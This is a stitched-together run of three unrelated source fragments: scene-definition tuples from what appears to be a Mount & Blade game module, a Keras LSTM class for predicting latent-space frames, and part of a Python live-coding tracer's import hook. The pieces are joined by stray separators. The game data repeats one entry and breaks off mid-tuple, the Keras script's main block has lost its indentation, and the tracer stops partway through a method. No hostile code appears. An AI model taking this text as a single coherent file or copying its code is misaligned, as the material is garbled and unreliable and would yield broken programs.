("training_ground_horse_track_2", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000000301553240004d5370000466000002a0f800073f1", [], [], "outer_terrain_plain"),
("training_ground_horse_track_3", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000000400c12b2000515470000216b0000485e00006928", [], [], "outer_terrain_snow"),
("training_ground_horse_track_4", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000000200b60320004a5290000180d0000452f00000e90", [], [], "outer_terrain_steppe"),
("training_ground_horse_track_5", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_5", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_6", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_7", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_8", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_9", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_10", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_11", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_12", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_13", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_14", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_15", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_16", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_17", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_horse_track_18", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000003008208e0006419000000f730000440f00003c86", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_1", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001350455c20005194a000041cb00005ae800000ff5", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_2", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x0000000532c8dccb0005194a000041cb00005ae800001bdd", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_3", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000054327dcba0005194a00001b1d00005ae800004d63", [], [], "outer_terrain_snow"),
("training_ground_ranged_melee_4", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x000000012247dcba0005194a000041ef00005ae8000050af", [], [], "outer_terrain_steppe"),
("training_ground_ranged_melee_5", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_6", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_7", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_8", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_9", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_10", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_11", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_12", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_13", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_14", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_15", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_16", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_17", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("training_ground_ranged_melee_18", sf_generate, "none", "none", (0.00, 0.00), (120.00, 120.00), -100.0, "0x00000001324a9cba0005194a000041ef00005ae800003c55", [], [], "outer_terrain_plain"),
("zendar_center", sf_generate, "none", "none", (0.00, 0.00), (100.00, 100.00), -100.0, "0x300bc5430001e0780000448a0000049f00007932", ["the_happy_boar", "random_scene", "zendar_merchant"], [], "outer_terrain_plain_1"),
("the_happy_boar", sf_indoors, "interior_town_house_f", "bo_interior_town_house_f", (-100.00, -100.00), (100.00, 100.00), -100.0, | |
import json
import time
import numpy as np
import tensorflow as tf
from LatentSpacePhysics.src.nn.stages import *
from LatentSpacePhysics.src.nn.helpers import *
from LatentSpacePhysics.src.nn.losses import *
from LatentSpacePhysics.src.nn.callbacks import LossHistory
from LatentSpacePhysics.src.nn.arch.architecture import Network
from LatentSpacePhysics.src.util import array
from LatentSpacePhysics.src.nn.lstm import error_classification
from ops import *
from math import floor
import keras
from keras.optimizers import Adam
from keras import objectives
from keras.layers import *
from keras.layers.pooling import AveragePooling2D, MaxPooling2D
from keras.models import Model, save_model, load_model
from keras.callbacks import Callback
from keras.regularizers import l1_l2, l2
from keras.utils import multi_gpu_model
import keras.backend as K
from keras_models_general import model_to_json
#=====================================================================================
#=====================================================================================
class Prediction(Network):
    """Sequence-to-sequence LSTM that predicts future latent-space frames.

    An encoder LSTM consumes a window of ``w_num`` encoded frames, a decoder
    LSTM expands the encoder summary back to ``out_w_num`` time steps, and an
    optional stack of 1x1 time-convolutions projects the decoder output to the
    latent dimension ``z_num``.  When ``in_out_states`` is enabled the LSTM
    cell/hidden states become explicit model inputs and outputs so that
    inference runs can be chained step by step.
    """
    #---------------------------------------------------------------------------------
    def _init_vars(self, config, **kwargs):
        """Store all hyper-parameters taken from ``config`` and ``kwargs``.

        :param config: parsed configuration namespace (see ``get_config``)
        :param kwargs: optional overrides (input_shape, stateful,
            in_out_states, states, l1_reg, l2_reg, tensorflow_seed)
        """
        # (input time steps, latent dimension) of the encoder input window.
        self.input_shape = kwargs.get("input_shape", (2, 32))
        # Network Parameters
        self.stateful = kwargs.get("stateful", False)
        self.in_out_states = kwargs.get("in_out_states", False)
        self.states = kwargs.get("states", [[None, None], [None, None], [None, None]])
        # States are only returned when they are also wired as inputs.
        self.return_state = self.in_out_states
        self.use_attention = False
        self.use_bidirectional = False
        self.lstm_activation = "tanh"
        self.use_time_conv_decoder = True
        self.time_conv_decoder_filters = 256
        self.time_conv_decoder_depth = 1
        self.adam_epsilon = None
        self.adam_learning_rate = 0.000126
        self.adam_lr_decay = 0.000334
        self.use_bias = True
        self.kernel_regularizer = None
        self.recurrent_regularizer = None
        self.bias_regularizer = None
        self.activity_regularizer = None
        self.dropout = 0.0
        self.recurrent_dropout = 0.0
        self.b_num = config.batch_size
        self.z_num = config.z_num
        self.w_num = self.input_shape[0]  # input time steps
        self.out_w_num = 1                # predicted time steps
        # Fall back to 512 neurons for configs that predate these settings.
        self.encoder_lstm_neurons = getattr(config, 'encoder_lstm_neurons', 512)
        self.decoder_lstm_neurons = getattr(config, 'decoder_lstm_neurons', 512)
        # Loss Setup
        self.set_loss(loss="mse")
        self.l1_reg = kwargs.get("l1_reg", 0.0)
        self.l2_reg = kwargs.get("l2_reg", 0.0)
        self.tensorflow_seed = kwargs.get("tensorflow_seed", 4)
        self.model = None
        tf.set_random_seed(self.tensorflow_seed)
        self.gpus = [int(gpu.strip()) for gpu in config.gpu_id.split(",")]
        print("Using GPUs: {}".format(self.gpus))
        self.parallel_model = None
        # Trainer Variables
        self.config = config
        self.arch = config.arch
        self.is_3d = config.is_3d
        self.optimizer = config.optimizer  # replaced by Adam in _init_optimizer
        self.beta1 = config.beta1
        self.beta2 = config.beta2
        self.model_dir = config.model_dir
        self.load_path = config.load_path
        self.dataset = config.dataset
    #---------------------------------------------------------------------------------
    def set_states(self, states):
        """Install externally supplied LSTM states (used with in_out_states)."""
        self.states = states
    #---------------------------------------------------------------------------------
    def set_loss(self, loss):
        """Set the training loss; metrics are intentionally left empty."""
        self.loss = loss
        self.metrics = []
    #---------------------------------------------------------------------------------
    def _init_optimizer(self, epochs=1):
        """Create the Adam optimizer from the stored hyper-parameters."""
        self.optimizer = Adam(lr=self.adam_learning_rate, epsilon=self.adam_epsilon, decay=self.adam_lr_decay)
        return self.optimizer
    #---------------------------------------------------------------------------------
    def _fix_output_dimension(self, x):
        """Pin the (possibly lost) time-step dimension of ``x`` to out_w_num.

        Works around a Keras shape-inference issue:
        https://github.com/keras-team/keras/issues/7961
        """
        pre_shape = x.shape.as_list()
        pre_shape[1] = self.out_w_num
        x.set_shape(pre_shape)
        return x
    #---------------------------------------------------------------------------------
    def _build_model(self):
        """Assemble the encoder/decoder LSTM graph and store it in self.model."""
        # Stateful LSTMs need a fixed batch size baked into the input layer.
        if self.stateful:
            pred_input = Input(batch_shape=(self.b_num,) + self.input_shape, dtype="float32", name='Temp_Prediction_Input')  # (self.time_steps, self.data_dimension)
        else:
            pred_input = Input(shape=self.input_shape, dtype="float32", name='Temp_Prediction_Input0')  # (self.time_steps, self.data_dimension)
        if self.in_out_states:
            # Explicit hidden/cell state inputs for encoder (0_x) and decoder (1_x).
            state_input_0_0 = Input(shape=(self.encoder_lstm_neurons,), dtype="float32", name='State00_Prediction_Input')
            state_input_0_1 = Input(shape=(self.encoder_lstm_neurons,), dtype="float32", name='State01_Prediction_Input')
            state_input_1_0 = Input(shape=(self.decoder_lstm_neurons,), dtype="float32", name='State10_Prediction_Input')
            state_input_1_1 = Input(shape=(self.decoder_lstm_neurons,), dtype="float32", name='State11_Prediction_Input')
        lstm_layer = []
        x = pred_input
        # Encoder: reads the input window backwards and emits a single summary vector.
        lstm_temp = LSTM(units=self.encoder_lstm_neurons,
                         dropout=self.dropout,
                         recurrent_dropout=self.recurrent_dropout,
                         return_sequences=False,
                         go_backwards=True,
                         stateful=self.stateful,
                         return_state=self.return_state,
                         name="TempPred_0"
                         )
        lstm_layer.append(lstm_temp)
        if self.in_out_states:
            x, self.states[0][0], self.states[0][1] = lstm_layer[-1](x, initial_state=[state_input_0_0, state_input_0_1])
        else:
            x = lstm_layer[-1](x)
        # Repeat the summary for each requested output time step.
        x = RepeatVector(self.out_w_num)(x)
        # Decoder: expands the summary back into a sequence.
        lstm_temp = LSTM(units=self.decoder_lstm_neurons,
                         dropout=self.dropout,
                         recurrent_dropout=self.recurrent_dropout,
                         return_sequences=True,
                         go_backwards=False,
                         stateful=self.stateful,
                         return_state=self.return_state,
                         name="TempPred_1"
                         )
        lstm_layer.append(lstm_temp)
        if self.in_out_states:
            x, self.states[1][0], self.states[1][1] = lstm_layer[-1](x, initial_state=[state_input_1_0, state_input_1_1])
        else:
            x = lstm_layer[-1](x)
        x = self._fix_output_dimension(x)
        if self.use_time_conv_decoder:
            # 1x1 convolutions over time refine the decoder output before the
            # final projection down to the latent size z_num.
            for i in range(self.time_conv_decoder_depth):
                x = Conv1D(filters=self.time_conv_decoder_filters, kernel_size=1, name="TempPred_{}".format(2 + i))(x)
                x = LeakyReLU(0.3)(x)
            x = Conv1D(filters=self.z_num, kernel_size=1, name="TempPred_{}".format(2 + self.time_conv_decoder_depth))(x)
            x = self._fix_output_dimension(x)
        outputs = [x]
        if self.in_out_states:
            outputs.append(self.states[0][0])
            outputs.append(self.states[0][1])
            outputs.append(self.states[1][0])
            outputs.append(self.states[1][1])
        inputs = [pred_input]
        if self.in_out_states:
            inputs.append(state_input_0_0)
            inputs.append(state_input_0_1)
            inputs.append(state_input_1_0)
            inputs.append(state_input_1_1)
        if len(self.gpus) > 1:
            # Keep the template model on the CPU so multi_gpu_model can
            # replicate it onto each device.
            with tf.device('/cpu:0'):
                self.model = Model(name="Prediction", inputs=inputs, outputs=outputs)
        else:
            self.model = Model(name="Prediction", inputs=inputs, outputs=outputs)
    #---------------------------------------------------------------------------------
    def _inner_RNN_layer(self, use_gru, output_dim, go_backwards, return_sequences, return_state):
        """Create a single GRU or LSTM layer with the configured regularizers."""
        activation = self.lstm_activation      # def: tanh
        recurrent_activation = 'hard_sigmoid'  # def: hard_sigmoid
        # The *_regularizer attributes hold l2 factors (floats) or None.
        kernel_regularizer = l2(l=self.kernel_regularizer) if self.kernel_regularizer is not None else None
        recurrent_regularizer = l2(l=self.recurrent_regularizer) if self.recurrent_regularizer is not None else None
        bias_regularizer = l2(l=self.bias_regularizer) if self.bias_regularizer is not None else None
        activity_regularizer = l2(l=self.activity_regularizer) if self.activity_regularizer is not None else None
        if use_gru:
            return GRU( units=output_dim,
                        stateful=self.stateful,
                        go_backwards=go_backwards,
                        return_sequences=return_sequences,
                        activation=activation,                      # def: tanh
                        recurrent_activation=recurrent_activation,  # def: hard_sigmoid
                        dropout=self.dropout,                       # def: 0.
                        recurrent_dropout=self.recurrent_dropout,   # def: 0.
                        return_state=return_state
                        )
        else:
            return LSTM(units=output_dim,
                        activation=activation,                      # def: tanh
                        recurrent_activation=recurrent_activation,  # def: hard_sigmoid
                        use_bias=self.use_bias,
                        kernel_initializer='glorot_uniform',
                        recurrent_initializer='orthogonal',
                        bias_initializer='zeros',
                        unit_forget_bias=True,
                        kernel_regularizer=kernel_regularizer,
                        recurrent_regularizer=recurrent_regularizer,
                        bias_regularizer=bias_regularizer,
                        activity_regularizer=activity_regularizer,
                        kernel_constraint=None,
                        recurrent_constraint=None,
                        bias_constraint=None,
                        dropout=self.dropout,                       # def: 0.
                        recurrent_dropout=self.recurrent_dropout,   # def: 0.
                        return_sequences=return_sequences,
                        go_backwards=go_backwards,
                        stateful=self.stateful,
                        return_state=return_state
                        )
    #---------------------------------------------------------------------------------
    def _add_RNN_layer_func(self, previous_layer, output_dim, go_backwards, return_sequences, return_state, bidirectional=False, use_gru=False):
        """Append an RNN layer (optionally bidirectional) to ``previous_layer``."""
        def _bidirectional_wrapper(use_bidirectional, inner_layer, merge_mode='concat'):
            # Wrap only on demand so the plain layer keeps its own weights/name.
            if use_bidirectional:
                return Bidirectional(layer=inner_layer, merge_mode=merge_mode)
            else:
                return inner_layer
        x = _bidirectional_wrapper(
            use_bidirectional = bidirectional,
            merge_mode = 'sum',
            inner_layer = self._inner_RNN_layer(
                use_gru=use_gru,
                output_dim=output_dim,
                go_backwards=go_backwards,
                return_sequences=return_sequences,
                return_state=return_state))(previous_layer)
        return x
    #---------------------------------------------------------------------------------
    def _compile_model(self):
        """Compile the model; replicate across GPUs when several are configured."""
        if len(self.gpus) > 1:
            self.parallel_model = multi_gpu_model(self.model, gpus=self.gpus)
            self.parallel_model.compile(loss=self.loss, optimizer=self.optimizer, metrics=self.metrics)
        else:
            self.model.compile(loss=self.loss, optimizer=self.optimizer, metrics=self.metrics)
    #--------------------------------------------
    # Helper functions
    #--------------------------------------------
    def __get_in_scene_iteration_count(self, sample_count, batch_size):
        # NOTE(review): appears unused inside this class; superseded by the
        # dynamic variant below. Kept for compatibility.
        return floor((sample_count + 1 - (self.w_num + self.out_w_num)) / batch_size)
    #--------------------------------------------
    def __get_in_scene_iteration_count_dynamic(self, sample_count, in_ts, out_ts, batch_size):
        """Number of batches obtainable from one scene with the given window sizes."""
        return floor((sample_count + 1 - (in_ts + out_ts)) / batch_size)
    #--------------------------------------------
    def __generator_nb_batch_samples(self, enc_scenes, batch_size):
        """Total number of batches per epoch over all encoded scenes."""
        scene_count = len(enc_scenes)            # e.g. 10 scenes
        sample_count = enc_scenes[0].shape[0]    # with 250 encoded samples each
        in_ts = self.w_num
        out_ts = self.out_w_num
        in_scene_it = self.__get_in_scene_iteration_count_dynamic(sample_count, in_ts, out_ts, batch_size)
        return scene_count * in_scene_it
    #--------------------------------------------
    def __generator_scene_func(self, enc_scenes, batch_size):
        """Endless batch generator over encoded scenes for fit_generator.

        Yields ``([X], [Y])`` windows, or the extended state in/out form with
        zero-initialized state tensors when ``in_out_states`` is active.
        """
        # Stateful training must preserve temporal order, so never shuffle then.
        shuffle = self.stateful is False
        scene_count = len(enc_scenes)
        sample_count = enc_scenes[0].shape[0]
        in_scene_iteration = self.__get_in_scene_iteration_count_dynamic(sample_count, self.w_num, self.out_w_num, batch_size)
        print("Scene Count: {} Sample Count: {} In-Scene Iteration: {}".format(scene_count, sample_count, in_scene_iteration))
        while 1:
            for i in range(scene_count):
                scene = enc_scenes[i]
                for j in range(in_scene_iteration):
                    enc_data = scene
                    start = j * batch_size
                    end = sample_count  # ((j+1) * self.batch_size) # - self.out_time_steps
                    X, Y = error_classification.restructure_encoder_data(
                        data = enc_data[start : end],
                        time_steps = self.w_num,
                        out_time_steps = self.out_w_num,
                        max_sample_count = batch_size)
                    # convert to (#batch, #ts, element_size)
                    X = X.reshape(*X.shape[0:2], -1)
                    Y = Y.reshape(Y.shape[0], self.out_w_num, -1)
                    if shuffle:
                        array.shuffle_in_unison(X, Y)
                    if self.in_out_states:
                        yield [X, np.zeros((self.b_num, self.encoder_lstm_neurons)), np.zeros((self.b_num, self.encoder_lstm_neurons)), np.zeros((self.b_num, self.decoder_lstm_neurons)), np.zeros((self.b_num, self.decoder_lstm_neurons))], [Y, np.zeros((self.b_num, self.encoder_lstm_neurons)), np.zeros((self.b_num, self.encoder_lstm_neurons)), np.zeros((self.b_num, self.decoder_lstm_neurons)), np.zeros((self.b_num, self.decoder_lstm_neurons))]
                    else:
                        yield [X], [Y]
    #---------------------------------------------------------------------------------
    def _train(self, epochs = 5, **kwargs):
        """Train the prediction network.

        Either pass pre-built arrays ``X``/``Y`` or a list of encoded scenes
        via ``train_scenes`` (then a generator pipeline is used). Returns the
        merged Keras ``History`` object.
        """
        # Arguments
        X = kwargs.get("X")
        Y = kwargs.get("Y")
        train_scenes = kwargs.get("train_scenes", None)
        validation_split = kwargs.get("validation_split")
        callbacks = kwargs.get("callbacks", [])
        # Train on the multi-GPU replica when one was built.
        model = self.model if self.parallel_model is None else self.parallel_model
        batch_size = kwargs.get("batch_size", 8)
        history = keras.callbacks.History()
        history.on_train_begin()
        # Default values for optional parameters
        if validation_split is None:  # fixed: identity check instead of "== None"
            validation_split = 0.1
        # Train
        train_generator = None
        validation_generator = None
        train_gen_nb_samples = 0
        val_gen_nb_samples = 0
        if train_scenes is not None:
            # validation split: last fraction of the scenes is held out
            validation_scenes = train_scenes[ floor(len(train_scenes) * (1.0 - validation_split)) : ]
            train_scenes = train_scenes[ : floor(len(train_scenes) * (1.0 - validation_split)) ]
            # use generator
            train_gen_nb_samples = self.__generator_nb_batch_samples(train_scenes, batch_size)
            print("Number of train batch samples per epoch: {}".format(train_gen_nb_samples))
            assert train_gen_nb_samples > 0, ("Batch size is too large for current scene samples/timestep settings. Training by generator not possible. Please adjust the batch size in the 'settings.json' file.")
            train_generator = self.__generator_scene_func(train_scenes, batch_size)
            # validation samples
            val_gen_nb_samples = self.__generator_nb_batch_samples(validation_scenes, batch_size)
            assert val_gen_nb_samples > 0, ("Batch size is too large for current scene samples/timestep settings. Training by generator not possible. Please adjust the batch size in the 'settings.json' file.")
            print("Number of validation batch samples per epoch: {}".format(val_gen_nb_samples))
            validation_generator = self.__generator_scene_func(validation_scenes, batch_size)
        try:
            trainingDuration = 0.0
            trainStartTime = time.time()
            if self.stateful:
                # NOTE(review): StatefulResetCallback and merge_histories are
                # presumably provided by the star imports (ops) — verify.
                reset_callback = StatefulResetCallback(model)
                callbacks.append(reset_callback)
                if (train_scenes is None):
                    assert X is not None and Y is not None, ("X or Y is None!")
                    # One epoch at a time so the LSTM states can be reset in between.
                    for i in range(epochs):
                        hist = model.fit(
                            X,
                            Y,
                            epochs=1,
                            batch_size=batch_size,
                            shuffle=False,
                            validation_split=validation_split,
                            callbacks=callbacks)
                        history = merge_histories(history, hist)
                        model.reset_states()
                else:
                    for i in range(epochs):
                        hist = model.fit_generator(
                            generator=train_generator,
                            steps_per_epoch=train_gen_nb_samples, # how many batches to draw per epoch
                            epochs = 1,
                            verbose=1,
                            callbacks=callbacks,
                            validation_data=validation_generator,
                            validation_steps=val_gen_nb_samples,
                            class_weight=None,
                            workers=1)
                        history = merge_histories(history, hist)
                        model.reset_states()
            else:
                if self.return_state:
                    reset_callback = StatefulResetCallback(model)
                    callbacks.append(reset_callback)
                if (train_scenes is None):
                    assert X is not None and Y is not None, ("X or Y is None!")
                    history = model.fit(
                        X,
                        Y,
                        epochs=epochs,
                        batch_size=batch_size,
                        shuffle=True,
                        validation_split=validation_split,
                        callbacks=callbacks)
                else:
                    history = model.fit_generator(
                        generator=train_generator,
                        steps_per_epoch=train_gen_nb_samples,
                        epochs = epochs,
                        verbose=1,
                        callbacks=callbacks,
                        validation_data=validation_generator,
                        validation_steps=val_gen_nb_samples,
                        class_weight=None,
                        workers=1)
            trainingDuration = time.time() - trainStartTime
        except KeyboardInterrupt:
            # fixed: report the actual elapsed time instead of the stale 0.0
            trainingDuration = time.time() - trainStartTime
            print("Training duration (s): {}\nInterrupted by user!".format(trainingDuration))
        print("Training duration (s): {}".format(trainingDuration))
        return history
    #---------------------------------------------------------------------------------
    def print_summary(self):
        """Print the Keras model summary."""
        print("Prediction")
        self.model.summary()
    #---------------------------------------------------------------------------------
    def load_model(self, path):
        """Load weights from ``<path>/prediction.h5`` into a freshly built model."""
        print("Loading model from {}".format(path))
        # Module-level keras load_model; only the weights are transferred so the
        # in-memory graph keeps this instance's configuration.
        temp_model = load_model(path + "/prediction.h5")
        if self.model is None:
            self._build_model()
        self.model.set_weights(temp_model.get_weights())
    #---------------------------------------------------------------------------------
    def save_model(self, path):
        """Save architecture (JSON) and full model (HDF5) under ``path``."""
        print("Saving model to {}".format(path))
        # serialize model to JSON
        model_to_json(self.model, path + "/prediction.json")
        save_model(self.model, path + "/prediction.h5")
    #---------------------------------------------------------------------------------
    def predict(self, x, batch_size=32):
        """Run inference on ``x``; returns the model's prediction array(s)."""
        return self.model.predict(x, batch_size=batch_size)
from config import get_config
from utils import prepare_dirs_and_logger
from keras_data import BatchManager
import os
from utils import save_image
from LatentSpacePhysics.src.util.requirements import init_packages
from LatentSpacePhysics.src.nn.lstm.sequence_training_data import *
init_packages()
import git
#---------------------------------------------------------------------------------
if __name__ == "__main__":
config, unparsed = get_config()
prepare_dirs_and_logger(config)
config_d = vars(config) if config else {}
unparsed_d = vars(unparsed) if unparsed else {}
with open(config.model_dir + "/input_args.json", 'w') as fp:
json.dump({**config_d, **unparsed_d}, fp)
# create GIT file
repo = git.Repo(search_parent_directories=False)
open("{}/{}".format(config.model_dir, repo.head.object.hexsha), "w") | |
from ast import parse
from base64 import standard_b64encode
import builtins
from importlib.abc import MetaPathFinder, Loader
from importlib.machinery import ModuleSpec
from importlib.util import find_spec
import inspect
import io
import os
import sys
import types
from pathlib import Path
from .code_tracer import trace_source_tree, CONTEXT_NAME
from .traced_finder import DEFAULT_MODULE_NAME, LIVE_MODULE_NAME, \
PSEUDO_FILENAME, TracedFinder
try:
from .mock_turtle import MockTurtle, monkey_patch_pyglet
except ImportError:
MockTurtle = monkey_patch_pyglet = None
class DelegatingModuleFinder(MetaPathFinder):
    """Meta-path finder that defers to the finders listed after it.

    Subclasses sit early on ``sys.meta_path`` and can intercept selected
    modules while letting every other import fall through to the regular
    machinery behind them.
    """

    def find_spec(self, fullname, path, target):
        # Ask each later finder in turn; the first spec found wins.
        for finder in self.following_finders:
            delegate = getattr(finder, 'find_spec', None)
            if delegate is None:
                continue
            spec = delegate(fullname, path, target)
            if spec is not None:
                return spec
        return None

    @property
    def following_finders(self):
        """Yield the finders that appear after this one on sys.meta_path."""
        seen_self = False
        for finder in sys.meta_path:
            if seen_self:
                yield finder
            elif finder is self:
                seen_self = True
# noinspection PyAbstractClass
class TracedModuleImporter(DelegatingModuleFinder, Loader):
    def __init__(self,
                 traced,
                 traced_file,
                 driver,
                 is_module,
                 is_live,
                 report_builder):
        """ Import the code that has been instrumented for live coding.

        :param str traced: name of module, function, class, or method to trace
        :param traced_file: name of the file to replace with source code from
            stdin, or None if all source code comes from files
        :param [str] driver: command-line arguments for the driver script
        :param bool is_module: True if the driver is a module, not a script
        :param bool is_live: True if in live coding mode
        :param ReportBuilder report_builder: to record events when the code
            runs.
        """
        self.is_traced_module_imported = False
        self.traced = traced
        # Globals dict the traced code will run in; the report builder is
        # injected under CONTEXT_NAME so instrumented lines can reach it.
        self.environment = {CONTEXT_NAME: report_builder}
        # A driver of '-' means "read the program from stdin": substitute the
        # pseudo filename for both the traced file and the driver argv[0].
        if driver and driver[0] == '-':
            traced_file = PSEUDO_FILENAME
            driver[0] = PSEUDO_FILENAME
        if traced_file is None:
            self.traced_file = traced_file
        else:
            # Canonicalize so later comparisons against spec.origin match;
            # fall back to the raw name when the file doesn't exist (yet).
            try:
                self.traced_file = str(Path(traced_file).resolve())
            except FileNotFoundError:
                self.traced_file = traced_file
        # Source only comes from stdin when a file is being replaced.
        self.source_code = traced_file and sys.stdin.read()
        self.driver = driver
        self.driver_module = driver[0] if is_module else None
        self.is_module = is_module
        self.is_live = is_live
        self.source_finder = None
        self.driver_finder = None
        self.report_builder = report_builder
        self.original_loaders = {}  # {fullname: loader}
        # Tracing the driver module itself: switch to the pseudo module name.
        if self.traced is not None and self.traced == self.driver_module:
            self.traced = LIVE_MODULE_NAME if is_live else DEFAULT_MODULE_NAME
        # Detect pytest runs (direct `-m pytest` or PyCharm's runner script),
        # which need assertion rewriting disabled below.
        is_plain_needed = is_divider_needed = False
        if self.driver_module == 'pytest':
            is_plain_needed = True
        elif not is_module and driver:
            try:
                driver_file = Path(driver[0]).name
            except ValueError:
                driver_file = None
            if driver_file == '_jb_pytest_runner.py':
                is_plain_needed = True
                # PyCharm's runner needs '--' before extra pytest options.
                is_divider_needed = True
        if is_plain_needed:
            # Assertion rewriting interferes with our module importer,
            # so disable it. Leave it alone if it's explicitly set.
            for driver_arg in self.driver:
                if driver_arg.startswith('--assert'):
                    break
            else:
                if is_divider_needed:
                    self.driver.append('--')
                self.driver.append('--assert=plain')
    def find_spec(self, fullname, path, target=None):
        """Intercept imports of the traced file/module; delegate the rest.

        Returns a spec loaded by self when the module is the traced file or
        the traced target; otherwise returns the delegated spec (possibly
        with its loader wrapped) or None.
        """
        spec = super(TracedModuleImporter, self).find_spec(fullname,
                                                           path,
                                                           target)
        if spec is not None:
            if spec.origin == self.traced_file:
                # This module is the file being replaced: load it ourselves.
                self.record_module(fullname)
                return ModuleSpec(fullname, self, origin=self.traced_file)
            # Ancestor package of the traced target: keep the original loader
            # around but route exec_module through self so tracing can hook in.
            # NOTE(review): assumes self.traced is not None whenever
            # traced_file is None — confirm against callers.
            if self.traced_file is None and self.traced.startswith(fullname):
                self.original_loaders[fullname] = spec.loader
                spec.loader = self
            return spec
        if fullname == self.traced:
            return ModuleSpec(fullname, self, origin=self.traced_file)
        return None
def record_module(self, module_name):
""" Record the module that was traced. """
if self.traced is None:
if module_name != self.driver_module:
self.traced = module_name
elif self.is_live:
self.traced = LIVE_MODULE_NAME
else:
self.traced = DEFAULT_MODULE_NAME
    def exec_module(self, module):
        """Compile and execute ``module``, instrumenting it when it is traced.

        Reads the module's source (from stdin-supplied code, the traced file,
        or disk), instruments the AST with trace_source_tree when this module
        is the traced target, then executes it in the shared environment.
        """
        module_spec = getattr(module, '__spec__', None)
